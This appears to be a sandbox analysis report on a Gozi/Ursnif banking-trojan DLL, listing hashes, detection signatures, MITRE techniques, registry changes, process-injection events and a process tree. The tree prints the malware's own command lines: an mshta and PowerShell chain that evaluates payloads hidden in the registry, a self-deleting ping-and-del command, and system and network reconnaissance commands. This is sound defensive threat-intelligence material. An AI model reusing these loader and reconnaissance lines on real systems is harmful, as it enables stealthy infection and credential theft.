gozi_ifsb | d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3

Analysis

max time kernel
150s
max time network
147s
platform
windows10_x64
resource
win10v20201028
submitted
25-11-2020 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c9d954b3f1c512e6804fd8f5637b58b6.dll
Size

234KB
MD5

c9d954b3f1c512e6804fd8f5637b58b6
SHA1

b452040d8072117ddbe1adf9e1eab5e4bdb150bd
SHA256

d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3
SHA512

a4e949017016c1cfaa9bdff664c8ee20b2a34fe78788de9a4338ae5ad9a8a2623ccafe6d4584ef4f6cb29bc05dbcb3a71cbcd4051560287fbe74fb5a5738c09b

Score

10^/10

gozi_ifsb ursnif banker spyware trojan

Malware Config

Extracted

Family

ursnif

Attributes

dga_base_url
dga_crc
0
dga_season
0
dga_tlds
dns_servers

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif

ServiceHost packer 1 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/812-32-0x0000000C09329000-mapping.dmp	servicehost

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Drops file in System32 directory 1 IoCs

Processes:

regsvr32.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt regsvr32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	regsvr32.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3916 set thread context of 3032	3916	powershell.exe	Explorer.EXE
PID 3032 set thread context of 812	3032	Explorer.EXE	cmd.exe
PID 3032 set thread context of 3416	3032	Explorer.EXE	RuntimeBroker.exe
PID 812 set thread context of 3924	812	cmd.exe	PING.EXE
PID 3032 set thread context of 3408	3032	Explorer.EXE	WinMail.exe
PID 3032 set thread context of 3948	3032	Explorer.EXE	cmd.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2536 1412 WerFault.exe regsvr32.exe
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

3684 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1640 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4052 systeminfo.exe

pid	pid_target	process	target process
2536	1412	WerFault.exe	regsvr32.exe

pid	process
3684	net.exe

pid	process
1640	tasklist.exe

pid	process
4052	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 52 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a09f576a6cc3d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30851948"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 305460636cc3d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8798DCF6-2F5F-11EB-B59A-DE6DDC9D1B26} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0c388636cc3d601	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1550852918"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a000000000200000000001066000000010000200000001f2b952abbb51ca22f728ce8626b74df3e04acbf78219ca9cb0afd963b771934000000000e8000000002000020000000a7f95d249eed6debc160601a6aee9ea4b58a2fa9ab96063455cd6bcf47cdd52a2000000007d985128fce0148e0dd0df56120ad74348bec5241362f7d74e6a775ef1a6c3440000000f98f6ae981139f58636ec59636e8d34f52a4fe8c832a95270e952c5cf3575f7dd0c4b24d367f69248ef30db62419a0f22d0efd7baeca3978436f616c328822bb	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9069926b6cc3d601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0e0556c6cc3d601	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1550852918"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A6EFB4B9-2F5F-11EB-B59A-DE6DDC9D1B26} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a000000000200000000001066000000010000200000009c733a3ecb249f54c88e81a9f749476b79615245daa57bde349670eb356f0112000000000e8000000002000020000000c346b6a205914aa7e856b8dc80aa0221e518eafe1bf3043c7f8d21c4f18130b220000000d8dcb6537bb9b8f685b39c287a4d99fcf2cd92634cb108d054d31a0a29368a5f4000000005365c37a0c833d81848312c0231b09b8a7b59d76b036530a2928fd136ed9becbad3ce4773c2312b2486796bea28b7db60b09127f4754e6b51520600b2b1c691	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000e28b8d47a643b85c43e00be90addf13490e60fb00d3e4c648e18dfd5fe48dc7c000000000e8000000002000020000000fa96ca4adaef76471be00109b46c2c26b77148a420ac2328474ae0847357bc5d20000000523e6b730d0ba3d5616fe628706f918d2286d0db4918d716c9ca7360d17140b0400000007683166471b8dbdec04287ae776d6f045583ea404a200c2008ad2306ac1a89ec39084903a1f6a0499b6e578f24a4383b7de7d211dde2ac4776d7b874ff77c01f	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a0000000002000000000010660000000100002000000091c1e07fda5be9b9225de1fa2c58b1e5c99ecba0f06bcc14b5238296921cbf4c000000000e8000000002000020000000e849e55a36c8c9db993a4912702f6b956595790746a87e1f0c90de9e2d8290d320000000cf737967110992b802ca9d7f639f455f46d91d6374af5f84dab6b7e563c79fde400000004850128b08301ba000b9b05464bc96e86a3335a1b8b906d2b78da5a486ba1acfa41b11a838cac1d67dbe18c4dd38954c609b0b12dce8a096ef60d5cae92e9b21	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a000000000200000000001066000000010000200000000aaf1c3f42e8e97be73ec9d5db4f348613ce9dac9d52b75838d10e363f20c03d000000000e8000000002000020000000c2f193eafc3c4743e90dd425b3d134dbecd9bf6664a96bd7682cc0f919a68105200000008427e7ea420566aff32e7651af0335d0503440c2c4ce2aecdf9fc888e86b3661400000005bede6d0c96d0618379e2ad3cfe7c876deb5aaca07e29490f795633873baeb81fb41e032403a0e65f30816b8bb82ea4c346d321773078c201dc0f2ebc1ac5c5c	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30851948"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3924 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3924 PING.EXE

pid	process
3924	PING.EXE

pid	process
3924	PING.EXE

Suspicious behavior: EnumeratesProcesses 1067 IoCs

Processes:

regsvr32.exepowershell.exeExplorer.EXEWerFault.exe

pid	process
1412	regsvr32.exe
1412	regsvr32.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
3032	Explorer.EXE
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
2536	WerFault.exe
3032	Explorer.EXE
3032	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3916 powershell.exe
3032 Explorer.EXE
3032 Explorer.EXE
812 cmd.exe
3032 Explorer.EXE
3032 Explorer.EXE

pid	process
3916	powershell.exe
3032	Explorer.EXE
3032	Explorer.EXE
812	cmd.exe
3032	Explorer.EXE
3032	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

powershell.exeExplorer.EXEWerFault.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeRestorePrivilege	2536	WerFault.exe
Token: SeBackupPrivilege	2536	WerFault.exe
Token: SeDebugPrivilege	2536	WerFault.exe
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE
Token: SeDebugPrivilege	1640	tasklist.exe
Token: SeShutdownPrivilege	3032	Explorer.EXE
Token: SeCreatePagefilePrivilege	3032	Explorer.EXE

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

iexplore.exeiexplore.exe

pid process

3676 iexplore.exe
3536 iexplore.exe
3536 iexplore.exe
3536 iexplore.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEExplorer.EXE

pid	process
3676	iexplore.exe
3676	iexplore.exe
1444	IEXPLORE.EXE
1444	IEXPLORE.EXE
3536	iexplore.exe
3536	iexplore.exe
3900	IEXPLORE.EXE
3900	IEXPLORE.EXE
3536	iexplore.exe
3536	iexplore.exe
2120	IEXPLORE.EXE
2120	IEXPLORE.EXE
3536	iexplore.exe
3536	iexplore.exe
3900	IEXPLORE.EXE
3900	IEXPLORE.EXE
3032	Explorer.EXE

Suspicious use of WriteProcessMemory 103 IoCs

Processes:

regsvr32.exeiexplore.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 500 wrote to memory of 1412	500	regsvr32.exe	regsvr32.exe
PID 500 wrote to memory of 1412	500	regsvr32.exe	regsvr32.exe
PID 500 wrote to memory of 1412	500	regsvr32.exe	regsvr32.exe
PID 3676 wrote to memory of 1444	3676	iexplore.exe	IEXPLORE.EXE
PID 3676 wrote to memory of 1444	3676	iexplore.exe	IEXPLORE.EXE
PID 3676 wrote to memory of 1444	3676	iexplore.exe	IEXPLORE.EXE
PID 3536 wrote to memory of 3900	3536	iexplore.exe	IEXPLORE.EXE
PID 3536 wrote to memory of 3900	3536	iexplore.exe	IEXPLORE.EXE
PID 3536 wrote to memory of 3900	3536	iexplore.exe	IEXPLORE.EXE
PID 3536 wrote to memory of 2120	3536	iexplore.exe	IEXPLORE.EXE
PID 3536 wrote to memory of 2120	3536	iexplore.exe	IEXPLORE.EXE
PID 3536 wrote to memory of 2120	3536	iexplore.exe	IEXPLORE.EXE
PID 992 wrote to memory of 3916	992	mshta.exe	powershell.exe
PID 992 wrote to memory of 3916	992	mshta.exe	powershell.exe
PID 3916 wrote to memory of 2896	3916	powershell.exe	csc.exe
PID 3916 wrote to memory of 2896	3916	powershell.exe	csc.exe
PID 2896 wrote to memory of 3212	2896	csc.exe	cvtres.exe
PID 2896 wrote to memory of 3212	2896	csc.exe	cvtres.exe
PID 3916 wrote to memory of 628	3916	powershell.exe	csc.exe
PID 3916 wrote to memory of 628	3916	powershell.exe	csc.exe
PID 628 wrote to memory of 204	628	csc.exe	cvtres.exe
PID 628 wrote to memory of 204	628	csc.exe	cvtres.exe
PID 3916 wrote to memory of 3032	3916	powershell.exe	Explorer.EXE
PID 3916 wrote to memory of 3032	3916	powershell.exe	Explorer.EXE
PID 3916 wrote to memory of 3032	3916	powershell.exe	Explorer.EXE
PID 3916 wrote to memory of 3032	3916	powershell.exe	Explorer.EXE
PID 3032 wrote to memory of 812	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 812	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 812	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3416	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 3416	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 812	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3416	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 3416	3032	Explorer.EXE	RuntimeBroker.exe
PID 3032 wrote to memory of 812	3032	Explorer.EXE	cmd.exe
PID 812 wrote to memory of 3924	812	cmd.exe	PING.EXE
PID 812 wrote to memory of 3924	812	cmd.exe	PING.EXE
PID 812 wrote to memory of 3924	812	cmd.exe	PING.EXE
PID 812 wrote to memory of 3924	812	cmd.exe	PING.EXE
PID 812 wrote to memory of 3924	812	cmd.exe	PING.EXE
PID 3032 wrote to memory of 3936	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3936	3032	Explorer.EXE	cmd.exe
PID 3936 wrote to memory of 936	3936	cmd.exe	nslookup.exe
PID 3936 wrote to memory of 936	3936	cmd.exe	nslookup.exe
PID 3032 wrote to memory of 3864	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3864	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 200	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 200	3032	Explorer.EXE	cmd.exe
PID 200 wrote to memory of 4052	200	cmd.exe	systeminfo.exe
PID 200 wrote to memory of 4052	200	cmd.exe	systeminfo.exe
PID 3032 wrote to memory of 3408	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 3408	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 3408	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 3408	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 3408	3032	Explorer.EXE	WinMail.exe
PID 3032 wrote to memory of 3948	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3948	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3948	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3948	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3948	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 3948	3032	Explorer.EXE	cmd.exe
PID 3032 wrote to memory of 4016	3032	Explorer.EXE	makecab.exe
PID 3032 wrote to memory of 4016	3032	Explorer.EXE	makecab.exe
PID 3032 wrote to memory of 3672	3032	Explorer.EXE	makecab.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Windows\system32\regsvr32.exe
  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:500
- - C:\Windows\SysWOW64\regsvr32.exe
    /s C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1412
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 744
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2536
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BFC92168-124C-49FC-1463-668D8847FA11\\\AppXxSip'));if(!window.flag)close()</script>"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\BFC92168-124C-49FC-1463-668D8847FA11").ActitLog))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvpfzcuv\uvpfzcuv.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2896
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82DD.tmp" "c:\Users\Admin\AppData\Local\Temp\uvpfzcuv\CSC762E9322FD8847EEA6EF987750CC2060.TMP"
        5⤵
        
        PID:3212
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige3kt1e\ige3kt1e.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:628
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84E0.tmp" "c:\Users\Admin\AppData\Local\Temp\ige3kt1e\CSC998CA52485224B93909351B159363957.TMP"
        5⤵
        
        PID:204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\c9d954b3f1c512e6804fd8f5637b58b6.dll"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:812
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:3924
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B362.bi1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3936
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:936
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B362.bi1"
  2⤵
  PID:3864
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:200
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:4052
- C:\Program Files\Windows Mail\WinMail.exe
  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  2⤵
  PID:3408
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:3948
- C:\Windows\system32\makecab.exe
  makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\742B.bin"
  2⤵
  PID:4016
- C:\Windows\system32\makecab.exe
  makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\3F35.bin"
  2⤵
  PID:3672
- C:\Windows\system32\makecab.exe
  makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\1289.bin"
  2⤵
  PID:1856
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
  2⤵
  PID:3888
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\E8AD.bin1"
